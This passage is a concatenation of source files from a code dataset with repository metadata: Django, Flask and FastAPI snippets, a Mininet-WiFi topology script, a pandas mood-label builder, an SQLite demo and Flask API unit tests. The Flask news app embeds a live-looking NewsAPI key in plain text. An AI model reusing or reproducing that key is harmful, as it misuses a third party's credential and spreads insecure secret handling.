] | permissive | blaxter/django-achilles | 5bfb334e95f8bdcf1fa8b751c5103ccf81283814 | ba696083ac42cd405640457fade6cf886dc99bb7 | refs/heads/master | 2021-01-21T18:43:54.214649 | 2014-05-20T17:00:15 | 2014-05-20T17:00:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | from . common import Table
from . columns import Column, MergeColumn, ActionColumn
__all__ = ["Table",
"Column",
"MergeColumn",
"ActionColumn"]
| [
"exekias@gmail.com"
] | exekias@gmail.com |
14426566868cacddadbd19f62e605c6b93c000f9 | 5e55919666ff9e41d590682985328bc5f9eebc6b | /twitter_code_dicts.py | 230b9199c4e95a8ea665f76c5448bb93169d1555 | [] | no_license | rtflynn/twitter_flask_app | 2eaa30716f021b2283daa2c8da304ecf629e85c1 | 65ec3265bc490b4e1ecccfb702997b4a5aa0d6c4 | refs/heads/master | 2020-04-10T14:27:19.972441 | 2018-12-09T21:12:11 | 2018-12-09T21:12:11 | 161,077,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 892 | py | langs = {'ar': 'Arabic', 'bg': 'Bulgarian', 'ca': 'Catalan', 'cs': 'Czech', 'da': 'Danish', 'de': 'German', 'el': 'Greek', 'en': 'English', 'es': 'Spanish', 'et': 'Estonian',
'fa': 'Persian', 'fi': 'Finnish', 'fr': 'French', 'hi': 'Hindi', 'hr': 'Croatian', 'hu': 'Hungarian', 'id': 'Indonesian', 'is': 'Icelandic', 'it': 'Italian', 'iw': 'Hebrew',
'ja': 'Japanese', 'ko': 'Korean', 'lt': 'Lithuanian', 'lv': 'Latvian', 'ms': 'Malay', 'nl': 'Dutch', 'no': 'Norwegian', 'pl': 'Polish', 'pt': 'Portuguese', 'ro': 'Romanian',
'ru': 'Russian', 'sk': 'Slovak', 'sl': 'Slovenian', 'sr': 'Serbian', 'sv': 'Swedish', 'th': 'Thai', 'tl': 'Filipino', 'tr': 'Turkish', 'uk': 'Ukrainian', 'ur': 'Urdu',
'vi': 'Vietnamese', 'zh_CN': 'Chinese (simplified)', 'zh_TW': 'Chinese (traditional)', 'NONE' : 'NONE', 'in' : 'in', 'und' : 'und', 'cy' : 'cy'}
error_codes = {}
| [
"noreply@github.com"
] | rtflynn.noreply@github.com |
e2fdf25b7497cc5c1fcb0bf489b3eb9332e5bb62 | 5faa3f139f30c0d290e327e04e3fd96d61e2aabb | /mininet-wifi/SWITCHON-2015/allWirelessNetworksAroundUs.py | 4e0c7e784e0db877764da170ac32d83db2baa977 | [] | no_license | hongyunnchen/reproducible-research | c6dfc3cd3c186b27ab4cf25949470b48d769325a | ed3a7a01b84ebc9bea96c5b02e0c97705cc2f7c6 | refs/heads/master | 2021-05-07T08:24:09.586976 | 2017-10-31T13:08:05 | 2017-10-31T13:08:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,525 | py | #!/usr/bin/python
"""This example is based on this video: https://www.youtube.com/watch?v=_C4H2gBdyQY"""
from mininet.net import Mininet
from mininet.node import Controller, OVSKernelSwitch, OVSKernelAP
from mininet.link import TCLink
from mininet.cli import CLI
from mininet.log import setLogLevel
import os
def topology():
"Create a network."
net = Mininet( controller=Controller, link=TCLink, switch=OVSKernelSwitch, accessPoint=OVSKernelAP )
print "*** Creating nodes"
sta1 = net.addStation( 'sta1', wlans=2, ip='10.0.0.2/8', max_x=120, max_y=50, min_v=1.4, max_v=1.6 )
h1 = net.addHost( 'h1', mac='00:00:00:00:00:01', ip='10.0.0.1/8' )
ap1 = net.addAccessPoint( 'ap1', ssid='ssid_ap1', mode= 'g', channel=6, position='70,25,0' )
ap2 = net.addAccessPoint( 'ap2', ssid='ssid_ap2', mode= 'g', channel=1, position='30,25,0' )
ap3 = net.addAccessPoint( 'ap3', ssid='ssid_ap3', mode= 'g', channel=11, position='110,25,0' )
s4 = net.addSwitch( 's4', mac='00:00:00:00:00:10' )
c1 = net.addController( 'c1', controller=Controller )
print "*** Configuring wifi nodes"
net.configureWifiNodes()
print "*** Associating and Creating links"
net.addLink(ap1, s4)
net.addLink(ap2, s4)
net.addLink(ap3, s4)
net.addLink(s4, h1)
sta1.cmd('modprobe bonding mode=3')
sta1.cmd('ip link add bond0 type bond')
sta1.cmd('ip link set bond0 address 02:01:02:03:04:08')
sta1.cmd('ip link set sta1-wlan0 down')
sta1.cmd('ip link set sta1-wlan0 address 00:00:00:00:00:11')
sta1.cmd('ip link set sta1-wlan0 master bond0')
sta1.cmd('ip link set sta1-wlan1 down')
sta1.cmd('ip link set sta1-wlan1 address 00:00:00:00:00:12')
sta1.cmd('ip link set sta1-wlan1 master bond0')
sta1.cmd('ip addr add 10.0.0.10/8 dev bond0')
sta1.cmd('ip link set bond0 up')
'seed'
net.seed(12)
'plotting graph'
net.plotGraph(max_x=140, max_y=140)
"*** Available models: RandomWalk, TruncatedLevyWalk, RandomDirection, RandomWaypoint, GaussMarkov ***"
net.startMobility(startTime=0, model='RandomDirection')
print "*** Starting network"
net.build()
c1.start()
s4.start( [c1] )
ap1.start( [c1] )
ap2.start( [c1] )
ap3.start( [c1] )
sta1.cmd('ip addr del 10.0.0.2/8 dev sta1-wlan0')
os.system('ovs-ofctl add-flow s4 actions=normal')
print "*** Running CLI"
CLI( net )
print "*** Stopping network"
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
topology()
| [
"ramonreisfontes@gmail.com"
] | ramonreisfontes@gmail.com |
14cd8c441283367752d210d1352a4860a053167c | 58cf8c5faf1a1e65029b6b4809a357d42c83e4e7 | /code/create_labels.py | dda494df6679a50dc39f96089952a08fe60dfef2 | [] | no_license | seanmandell-zz/mood-predictor-project | 98604c4a1e7a0b60fa3ebed6505a174d4da6f29b | afcce61ddebe17f61eb504efb9d4e57f34796663 | refs/heads/master | 2021-06-01T03:03:11.371700 | 2016-02-09T17:39:55 | 2016-02-09T17:39:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,392 | py | import pandas as pd
import string
def _read_clean(fname):
'''
INPUT: string
OUTPUT: DataFrame
Reads in CSV file and returns a cleaned DataFrame.
'''
input_name = '../data/' + fname
df_phone_survey = pd.read_csv(input_name)
df_mood_qs = df_phone_survey[df_phone_survey['questions_raw'].map(lambda x: string.find(x, 'happy') >= 0)]
df_mood_qs.loc[:, 'answer_date'] = df_mood_qs['date'].map(lambda x: pd.to_datetime(x.split()[0]))
df_mood_qs.loc[:, 'date'] = df_mood_qs['name'].map(lambda x: pd.to_datetime(x.split()[1]))
''' Drops rows where not all answers are filled in'''
df_mood_qs.loc[:, 'answers_len'] = df_mood_qs['answers_raw'].map(lambda x: len(x))
df_mood_qs = df_mood_qs[((df_mood_qs['answers_len'] >= 42) & (df_mood_qs['answers_len'] <= 44))] # sic
return df_mood_qs
def _extract_mood_responses(df_mood_qs, poss_labels):
'''
INPUT: DataFrame
OUTPUT: DataFrame
Extracts participants' numerical rankings of their daily moods.
'''
if poss_labels.count('happy') > 0:
df_mood_qs['happy'] = df_mood_qs['answers_raw'].map(lambda x: int(x[17]))
if poss_labels.count('stressed') > 0:
df_mood_qs['stressed'] = df_mood_qs['answers_raw'].map(lambda x: int(x[21]))
if poss_labels.count('productive') > 0:
df_mood_qs['productive'] = df_mood_qs['answers_raw'].map(lambda x: x[25])
df_mood_qs = df_mood_qs[df_mood_qs['productive'] != '>'] # Drops very few
df_mood_qs.loc[:, 'productive'] = df_mood_qs['productive'].map(lambda x: int(x))
df_mood_qs.drop(['name', 'answers_len', 'questions_raw', 'answers_raw'], axis=1, inplace=True)
return df_mood_qs
def _create_dummies(df_mood_qs, to_dummyize, very_cutoff_inclusive, very_un_cutoff_inclusive):
'''
INPUT: DataFrame, list, int, int
OUTPUT: DataFrame
Creates 3 dummies for any/all moods in to_dummyize:
- [mood]_dummy, 1 if mood rated as >= 5
- very_[mood], 1 if mood rated as >= very_cutoff_inclusive
- very_un[mood], 1 if mood rated as <= very_un_cutoff_inclusive
'''
for lab in to_dummyize:
dummy_name = lab + '_dummy'
very_name = 'very_' + lab
very_un_name = 'very_un' + lab
df_mood_qs[dummy_name] = 0 + (df_mood_qs[lab] >= 5)
df_mood_qs[very_name] = 0 + (df_mood_qs[lab] >= 6)
df_mood_qs[very_un_name] = 0 + (df_mood_qs[lab] <= 2)
return df_mood_qs
def create_poss_labels(fname, poss_labels, to_dummyize, very_cutoff_inclusive=6, very_un_cutoff_inclusive=2, answer_offset_cutoff=-1):
'''
INPUT: string, int
OUTPUT: DataFrame
Returns a DataFrame whose columns correspond to labels to be predicted.
--> answer_offset_cutoff: if != -1, answers submitted *at least* answer_offset_cutoff
days after the date in question will be omitted
Columns as follows (indented are optional dummies specified by to_dummyize parameter):
- participantID
- date
- happy (1-7, 7 is happiest)
- happy_dummy, 1 if happy >= 4
- very_happy, 1 if happy >= very_cutoff_inclusive
- very_unhappy, 1 if happy <= very_un_cutoff_inclusive
- stressed (1-7, 7 is most stressed)
- stressed_dummy, 1 if stressed >= 4
- very_stressed, 1 if stressed >= very_cutoff_inclusive
- very_unstressed, 1 if stressed <= very_un_cutoff_inclusive
- productive (1-7, 7 is most productive)
- productive_dummy, 1 if productive >= 4
- very_productive, 1 if productive >= very_cutoff_inclusive
- very_unproductive, 1 if productive <= very_un_cutoff_inclusive
'''
df_mood_qs = _read_clean(fname)
df_mood_qs = _extract_mood_responses(df_mood_qs, poss_labels)
df_mood_qs = _create_dummies(df_mood_qs, to_dummyize, very_cutoff_inclusive, very_un_cutoff_inclusive)
''' Drops where the survey is answered before the corresponding date has passed '''
df_mood_qs['answer_offset_days'] = df_mood_qs['answer_date'] - df_mood_qs['date']
df_mood_qs = df_mood_qs[df_mood_qs['answer_offset_days'] >= pd.to_timedelta('0 days')]
if answer_offset_cutoff != -1:
df_mood_qs = df_mood_qs[df_mood_qs['answer_offset_days'] < answer_offset_cutoff]
df_mood_qs.drop(['answer_offset_days', 'answer_date'], axis=1, inplace=True)
return df_mood_qs
| [
"sean.mandell1@gmail.com"
] | sean.mandell1@gmail.com |
49ffeca35c1b74f3925d227c6a8d353c78c2eee2 | 2601395b3cd4ddd61f6b09f21ee34c47a11e40e4 | /database/oauth2_password_bearer_cookie.py | 10ce006f65505b415606799f508b92a8ee73be0c | [] | no_license | taiharry108/fastapi-manga-server | 3197a98d5027a9069efd207c2c0b19c0075491c5 | e09102c9122cb1aa69bbeb9b87a868bf3c0073c2 | refs/heads/master | 2023-01-03T12:19:32.761083 | 2020-09-12T01:00:05 | 2020-09-12T01:00:05 | 288,659,800 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,798 | py | from fastapi.security.oauth2 import (
OAuth2,
OAuthFlowsModel,
get_authorization_scheme_param,
)
from typing import Optional
from starlette.requests import Request
from starlette.status import HTTP_403_FORBIDDEN
from fastapi import HTTPException
class OAuth2PasswordBearerCookie(OAuth2):
def __init__(
self,
tokenUrl: str,
scheme_name: str = None,
scopes: dict = None,
auto_error: bool = True,
):
if not scopes:
scopes = {}
flows = OAuthFlowsModel(
password={"tokenUrl": tokenUrl, "scopes": scopes})
super().__init__(flows=flows, scheme_name=scheme_name, auto_error=auto_error)
async def __call__(self, request: Request) -> Optional[str]:
header_authorization: str = request.headers.get("Authorization")
cookie_authorization: str = request.cookies.get("Authorization")
header_scheme, header_param = get_authorization_scheme_param(
header_authorization
)
cookie_scheme, cookie_param = get_authorization_scheme_param(
cookie_authorization
)
param = scheme = None
if header_scheme.lower() == "bearer":
authorization = True
scheme = header_scheme
param = header_param
elif cookie_scheme.lower() == "bearer":
authorization = True
scheme = cookie_scheme
param = cookie_param
else:
authorization = False
if not authorization or scheme.lower() != "bearer":
if self.auto_error:
raise HTTPException(
status_code=HTTP_403_FORBIDDEN, detail="Not authenticated"
)
else:
return None
return param
| [
"taiharry108@gmail.com"
] | taiharry108@gmail.com |
593744e9a93eac6acc19145fbf21f947a6a9a309 | 68b91532e97ed9fa6f299880418f2e1556fa8e09 | /sign/admin.py | c782bf4438eb6c1a99d7c84c4f766b9194774402 | [] | no_license | ffaa30703/python_webtest | 492e35ba6182d4b35ce656ca998329b35a9662ca | df445bfba017afc4faa92a3cea25420fdef1a00a | refs/heads/master | 2020-06-22T09:47:16.325807 | 2019-07-19T03:15:36 | 2019-07-19T03:15:36 | 197,693,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | from django.contrib import admin
from sign.models import Event, Guest
# Register your models here.
class EventAdmin(admin.ModelAdmin):
list_display = ['id', 'name', 'status', 'address', 'start_time']
search_fields = ['name']
list_filter = ['status']
class GuestAdmin(admin.ModelAdmin):
list_display = ['realname', 'phone', 'email', 'sign', 'create_time', 'event']
search_fields = ['realname']
admin.site.register(Event, EventAdmin)
admin.site.register(Guest, GuestAdmin)
| [
"ffaa30703@icloud.com"
] | ffaa30703@icloud.com |
78ec6e48e8c2ef6d7fc07399022eb1070c47acab | 6f04a28ac7128137dc68aea09363e4666d285ce3 | /car/migrations/0015_alter_car_options.py | c8d5ffe8c2bd93ab468870a884983b203be33e30 | [] | no_license | Temiwe/django_cars | 8cb1166318bff2aef81d1c44ccbccea2f3c9c4e6 | a740393aa02eb7714e03fa43edf73be352c3a76b | refs/heads/main | 2023-06-06T08:12:50.752552 | 2021-07-02T14:06:06 | 2021-07-02T14:06:06 | 376,011,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 343 | py | # Generated by Django 3.2.4 on 2021-06-26 10:27
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('car', '0014_auto_20210611_1454'),
]
operations = [
migrations.AlterModelOptions(
name='car',
options={'ordering': ['car_model']},
),
]
| [
"vasilishin.a@icloud.com"
] | vasilishin.a@icloud.com |
72d2f9bd36e51696367187201ee7d11f8268d192 | c78ed0ab5d6321b536654986d69b137279a5f258 | /test_API.py | a02944fbf8b46786fd235deb1bb02c1d2597688c | [] | no_license | lstrait2/Wikipedia-Scraper | 597f84e1d0d47740fca1a6771c435dc5ddab06c9 | 23cab179a144d790abc303f87536d0450d76f104 | refs/heads/master | 2021-09-13T23:32:06.960510 | 2018-05-05T18:24:43 | 2018-05-05T18:24:43 | 106,033,539 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,953 | py | from model.graph.graph import Graph
import app
import json
import unittest
class APITestCase(unittest.TestCase):
def setUp(self):
app.app.config['TESTING'] = True
self.flask_app = app.app.test_client()
self.graph_data = Graph('model/data/data.json').to_json()
# test a request to an invalid URL
def test_get_invalid_url(self):
res = self.flask_app.get('/api/invalid/actors/Bruce Willis')
# should throw 404
self.assertEqual(res.status_code, 404)
# test a valid GET request for an actor
def test_get_actor_valid(self):
res = self.flask_app.get('/api/actors/Bruce Willis')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# compare response data to stored JSON
self.assertEqual(data, self.graph_data[0]['Bruce Willis'])
# Test an invalid GET request for an actor
def test_get_actor_invalid(self):
res = self.flask_app.get('/api/actors/afafafafaf')
# request should be unsuccessful
self.assertEqual(res.status_code, 400)
# check that custom error handler was invoked
data = json.loads(res.data)
self.assertEqual(data, {'status': "Bad request. Make sure you are providing valid parameters"})
# Test a valid GET request for a movie
def test_get_movie_valid(self):
res = self.flask_app.get('/api/movies/Pulp Fiction')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# compare response data to stored JSON
self.assertEqual(data, self.graph_data[1]['Pulp Fiction'])
# Test a valid GET request for a movie
def test_get_movie_invalid(self):
res = self.flask_app.get('/api/movies/dfkadkadz')
# request should be unsuccessful
self.assertEqual(res.status_code, 400)
# check that custom error handler was invoked
data = json.loads(res.data)
self.assertEqual(data, {'status': "Bad request. Make sure you are providing valid parameters"})
# Test a valid GET request for movies
def test_get_movies_valid(self):
res = self.flask_app.get('/api/movies/?name="Pulp Fiction"')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# Pulp Fiction should be in data response
self.assertEqual(data['Pulp Fiction'], self.graph_data[1]['Pulp Fiction'])
# Pulp Fiction should be only movie in data response
self.assertEqual(len(data.keys()), 1)
# Test a valid GET request for movies, more complex querystring
def test_get_movies_complex(self):
res = self.flask_app.get('/api/movies/?name="Pulp Fiction"|box_office=24')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# Pulp Fiction should be in data response
self.assertEqual(data['Pulp Fiction'], self.graph_data[1]['Pulp Fiction'])
# The Bye Bye Man should also be in data response
self.assertEqual(data['The Bye Bye Man'], self.graph_data[1]['The Bye Bye Man'])
# Nothing else should be in data
self.assertEqual(len(data.keys()), 2)
# Test a valid GET request for movies, more complex querystring
def test_get_movies_complex_boolean_exp(self):
res = self.flask_app.get('/api/movies/?name="Pulp Fiction"|box_office=24&actors="John Travolta"')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# Pulp Fiction should be in data response
self.assertEqual(data['Pulp Fiction'], self.graph_data[1]['Pulp Fiction'])
# Nothing else should be in data
self.assertEqual(len(data.keys()), 1)
# Test a invalid GET request for movies
def test_get_movies_invalid(self):
res = self.flask_app.get('/api/movies/?name="Unknown Fake Name')
# request should be successful
self.assertEqual(res.status_code, 200)
# check that response data is empty
data = json.loads(res.data)
self.assertEqual(data, {})
# Test a valid GET request for actors
def test_get_actors_valid(self):
res = self.flask_app.get('/api/actors/?name="Bruce Willis"')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# compare response data to stored JSON
self.assertEqual(data['Bruce Willis'], self.graph_data[0]['Bruce Willis'])
# Bruce Willis should be only actor in data response
self.assertEqual(len(data.keys()), 1)
# Test a valid GET request for actors, more complex querystring
def test_get_actors_valid_complex(self):
res = self.flask_app.get('/api/actors/?age=94|name="Bruce Willis')
# request should be successful
self.assertEqual(res.status_code, 200)
# read res data into dictionary
data = json.loads(res.data)
# compare response data to stored JSON
self.assertEqual(data['Bruce Willis'], self.graph_data[0]['Bruce Willis'])
self.assertEqual(data['Steven Hill'], self.graph_data[0]['Steven Hill'])
self.assertEqual(data['Abe Vigoda'], self.graph_data[0]['Abe Vigoda'])
self.assertEqual(len(data.keys()), 3)
# Test a invalid GET request for actors
def test_get_actors_invalid(self):
res = self.flask_app.get('/api/actors/?name="Unknown Fake Name')
# request should be successful
self.assertEqual(res.status_code, 200)
# check that response data is empty
data = json.loads(res.data)
self.assertEqual(data, {})
# Test a invalid GET request for actors
def test_get_actors_invalid_param(self):
res = self.flask_app.get('/api/actors/?stuff="Unknown Fake Name')
# request should be successful
self.assertEqual(res.status_code, 200)
# check that response data is empty
data = json.loads(res.data)
self.assertEqual(data, {})
# Test a valid PUT request for a movie
def test_put_movie_valid(self):
res = self.flask_app.put('/api/movies/Pulp Fiction', data=json.dumps({'box_office': 500}),
headers={'Content-Type': 'application/json'})
# request should be successful
self.assertEqual(res.status_code, 200)
data = json.loads(res.data)
# check that box office was updated
self.assertEqual(data['box_office'], 500)
# if we now do a get request new value should be reflected
res2 = self.flask_app.get('/api/movies/Pulp Fiction')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear still
self.assertEqual(data['box_office'], 500)
# Test a invalid PUT request for a movie
def test_put_movie_invalid(self):
res = self.flask_app.put('/api/movies/Pulp Fiction', data=json.dumps({'boxO': 500}),
headers={'Content-Type': 'application/json'})
# request should not be successful
self.assertEqual(res.status_code, 400)
# if we now do a get request data should be unchanged
res2 = self.flask_app.get('/api/movies/Pulp Fiction')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear still
self.assertEqual(data['box_office'], 213)
# Test a invalid PUT request for a movie
def test_put_movie_invalid_content_type(self):
res = self.flask_app.put('/api/movies/Pulp Fiction', data=json.dumps({'box_office': 500}),
headers={'Content-Type': 'application/text'})
# request should not be successful
self.assertEqual(res.status_code, 400)
# if we now do a get request data should be unchanged
res2 = self.flask_app.get('/api/movies/Pulp Fiction')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear still
self.assertEqual(data['box_office'], 213)
# Test a valid PUT request for an actor
def test_put_actor_valid(self):
res = self.flask_app.put('/api/actors/Bruce Willis', data=json.dumps({'total_gross': 500}),
headers={'Content-Type': 'application/json'})
# request should be successful
self.assertEqual(res.status_code, 200)
data = json.loads(res.data)
# check that total gross was updated
self.assertEqual(data['total_gross'], 500)
# if we now do a get request new value should be reflected
res2 = self.flask_app.get('/api/actors/Bruce Willis')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear still
self.assertEqual(data['total_gross'], 500)
# Test a invalid PUT request for an actor
def test_put_actor_invalid(self):
res = self.flask_app.put('/api/actors/Bruce Willis', data=json.dumps({'tgross': 500}),
headers={'Content-Type': 'application/json'})
# request should be successful
self.assertEqual(res.status_code, 400)
# if we now do a get request no change should have made
res2 = self.flask_app.get('/api/actors/Bruce Willis')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear still
self.assertEqual(data['total_gross'], 562709189)
# Test a valid POST request for an actor
def test_post_movie_valid(self):
res = self.flask_app.post('/api/movies/', data=json.dumps({'name': "Some New Movie"}),
headers={'Content-Type': 'application/json'})
# request should be successful - 201 for created
self.assertEqual(res.status_code, 201)
data = json.loads(res.data)
# check that new movie appears in output
self.assertEqual(data, {'name': "Some New Movie"})
# if we now do a get request new value should be reflected
res2 = self.flask_app.get('/api/movies/Some New Movie')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear
self.assertEqual(data, {'name': "Some New Movie"})
# Test a invalid POST request for an movie
def test_post_movie_invalid_no_name(self):
res = self.flask_app.post('/api/movies/', data=json.dumps({'year': 2007}),
headers={'Content-Type': 'application/json'})
# request should be unsuccessful
self.assertEqual(res.status_code, 400)
data = json.loads(res.data)
# check that error output appears
self.assertEqual(data, {'status': "Bad request. Make sure you are providing valid parameters"})
# Test a invalid POST request for an movie
def test_post_movie_invalid_wrong_type(self):
res = self.flask_app.post('/api/movies/', data=json.dumps({'name': 'some_new_movie'}),
headers={'Content-Type': 'application/text'})
# request should be unsuccessful
self.assertEqual(res.status_code, 400)
data = json.loads(res.data)
# check that error output appears
self.assertEqual(data, {'status': "Bad request. Make sure you are providing valid parameters"})
# Test a valid POST request for an actor
def test_post_actor_valid(self):
res = self.flask_app.post('/api/actors/', data=json.dumps({'name': "Some New Actor"}),
headers={'Content-Type': 'application/json'})
# request should be successful - 201 for created
self.assertEqual(res.status_code, 201)
data = json.loads(res.data)
# check that new movie appears in output
self.assertEqual(data, {'name': "Some New Actor"})
# if we now do a get request new value should be reflected
res2 = self.flask_app.get('/api/actors/Some New Actor')
# request should be successful
self.assertEqual(res2.status_code, 200)
# read res data into dictionary
data = json.loads(res2.data)
# changed value should appear
self.assertEqual(data, {'name': "Some New Actor"})
# Test a invalid POST request for an actor
def test_post_actor_invalid_no_name(self):
res = self.flask_app.post('/api/actors/', data=json.dumps({'age': 20}),
headers={'Content-Type': 'application/json'})
# request should be unsuccessful
self.assertEqual(res.status_code, 400)
data = json.loads(res.data)
# check that error output appears
self.assertEqual(data, {'status': "Bad request. Make sure you are providing valid parameters"})
# Test a invalid POST request for an actor
def test_post_actor_invalid_wrong_type(self):
res = self.flask_app.post('/api/actors/', data=json.dumps({'name': 'some_new_actor'}),
headers={'Content-Type': 'application/text'})
# request should be unsuccessful
self.assertEqual(res.status_code, 400)
data = json.loads(res.data)
# check that error output appears
self.assertEqual(data, {'status': "Bad request. Make sure you are providing valid parameters"})
# Test successful DELETE request for movie
def test_delete_movie_valid(self):
res = self.flask_app.delete('/api/movies/Ed')
self.assertEquals(res.status_code, 200)
data = json.loads(res.data)
# success message should appear
self.assertEqual({'status': "Deletion of Ed was successful"}, data)
# should not be able to look up deleted movie
res = self.flask_app.get('/api/movies/Ed')
self.assertEqual(res.status_code, 400)
# Test unsuccessful DELETE request for movie
def test_delete_movie_invalid(self):
res = self.flask_app.delete('/api/movies/some_movie')
# should fail
self.assertEquals(res.status_code, 400)
# Test successful DELETE request for actor
def test_delete_actor_valid(self):
res = self.flask_app.delete('/api/actors/Madeleine Stowe')
self.assertEquals(res.status_code, 200)
data = json.loads(res.data)
# success message should appear
self.assertEqual({'status': "Deletion of Madeleine Stowe was successful"}, data)
# should not be able to look up deleted movie
res = self.flask_app.get('/api/actors/Madeleine Stowe')
self.assertEqual(res.status_code, 400)
# Test unsuccessful DELETE request for actor
def test_delete_actor_invalid(self):
res = self.flask_app.delete('/api/actors/some_actor')
# should fail
self.assertEquals(res.status_code, 400)
if __name__ == '__main__':
unittest.main() | [
"lstrait2@d9c94b55-221a-4017-ad66-301122ff4019"
] | lstrait2@d9c94b55-221a-4017-ad66-301122ff4019 |
e8f1d5c9e09a71f694045e5a65ce896486a2da64 | e4042f342f611ebf829f56946c46bbb9af7e2d2a | /app.py | 5c4b86dfbdd6e635a25c2f5ca1d9e2778a1deabe | [] | no_license | ivxxi/flasknews | 8c3a41566ea205f6a82cd9c5dce5c159d589d2ac | 5090692311333fb4c1bcf345fe7143b3d87a66b4 | refs/heads/master | 2022-09-20T08:07:31.641415 | 2020-05-30T12:21:08 | 2020-05-30T12:21:08 | 268,073,878 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,312 | py | from flask import Flask, render_template
from newsapi import NewsApiClient
app = Flask(__name__)
@app.route('/')
def index():
newsapi = NewsApiClient(api_key="89978371303b45eb819a53f77fc04e5d")
topheadlines = newsapi.get_top_headlines(sources="al-jazeera-english")
articles = topheadlines['articles']
desc = []
news = []
img = []
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
desc.append(myarticles['description'])
img.append(myarticles['urlToImage'])
mylist = zip(news, desc, img)
return render_template('index.html', context = mylist)
@app.route('/bbc')
def bbc():
newsapi = NewsApiClient(api_key="89978371303b45eb819a53f77fc04e5d")
topheadlines = newsapi.get_top_headlines(sources="bbc-news")
articles = topheadlines['articles']
desc = []
news = []
img = []
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
desc.append(myarticles['description'])
img.append(myarticles['urlToImage'])
mylist = zip(news, desc, img)
return render_template('bbc.html', context = mylist)
if __name__ == "__main__":
app.run(debug=True)
| [
"crystalalice21@gmail.com"
] | crystalalice21@gmail.com |
ce5b510de836023c484377ea5231f685d4fc5fd1 | 69813e81a08c8ec041ad874661e0fcc9771f8ed0 | /Lab-3/lab3-database-demo.py | 3a885fccd4272387d5630bfc23c853f6862df8f3 | [] | no_license | jackharold/SYSC3010_jack_harold | 9fdcaca96caa40ce5420306712a6698c1159f102 | 2355d9818eac5affadee577b658b68fd2292f8c6 | refs/heads/master | 2022-12-25T18:45:01.487610 | 2020-10-09T19:13:59 | 2020-10-09T19:13:59 | 295,858,194 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,728 | py | #!/usr/bin/env python3
import sqlite3
#connect to database file
dbconnect = sqlite3.connect("main.db");
#If we want to access columns by name we need to set
#row_factory to sqlite3.Row class
dbconnect.row_factory = sqlite3.Row;
#now we create a cursor to work with db
cursor = dbconnect.cursor();
#execute insert statement
cursor.execute('''insert into temps values ('01-Jan', '12:01 PM', 'kitchen', 21.0)''');
dbconnect.commit();
#execute simple select statement
cursor.execute('SELECT * FROM temps');
#print data
for row in cursor:
print(row['tdate'],row['ttime'],row['zone'],row['temperature'] );
#close the connection
cursor.execute('DELETE FROM temps');
dbconnect.commit();
#Creating the sedond table (sensor)
cursor.execute('create table if not exists sensors(sensorID integer, type text, zone text)');
cursor.execute('delete from sensors');
dbconnect.commit();
typeInit = ["door", "temperature", "door", "motion", "temperature"];
zoneInit = ["kitchen", "kitchen", "garage", "garage", "garage"];
for i in range(5):
command = "insert into sensors values (" + str(i+1) + ", '" + typeInit[i] + "', '" + zoneInit[i] + "')";
cursor.execute(command);
dbconnect.commit();
cursor.execute('select * from sensors');
#for row in cursor:
# print(row['sensorID'], row['type'], row['zone'])
#print("");
print("Searching for all sensors in the kitchen:");
cursor.execute("select * from sensors where zone = 'kitchen'");
for row in cursor:
print(row['sensorID'], row['type'], row['zone'])
print("");
print("Searching for all door sensors:");
cursor.execute("select * from sensors where type = 'door'");
for row in cursor:
print(row['sensorID'], row['type'], row['zone'])
print("");
dbconnect.close();
| [
"jackharold019@gmail.com"
] | jackharold019@gmail.com |
fc10948d86708b6f47a13b0e303228135646e05a | e76f6fdb1a2ea89d4f38ac1ed28e50a7625e21b7 | /qytdjg_learning/views/Form.py | f0c4967d53b2ea07c09c61e006a240cff2f1d5c2 | [] | no_license | collinsctk/qytdjg_learning | 4d61a2a236f0bc4bf9be8d999352a8e3c1b87408 | 72a6d6153f6ca6bf9fccad76612450fdaf83d9fd | refs/heads/master | 2020-03-24T19:45:31.145059 | 2018-07-31T06:51:14 | 2018-07-31T06:51:14 | 142,943,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,628 | py | #!/usr/bin/env python3
# -*- coding=utf-8 -*-
# 本脚由亁颐堂现任明教教主编写,用于乾颐盾Python课程!
# 教主QQ:605658506
# 亁颐堂官网www.qytang.com
# 教主技术进化论拓展你的技术新边疆
# https://ke.qq.com/course/271956?tuin=24199d8a
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.shortcuts import render
# 表单
# 获取客户端请求的相关信息
def requestInfo(request):
result = 'path: %s ' % request.path
result = result + '<br>host: %s ' % request.get_host()
result = result + '<br>full_path %s ' % request.get_full_path()
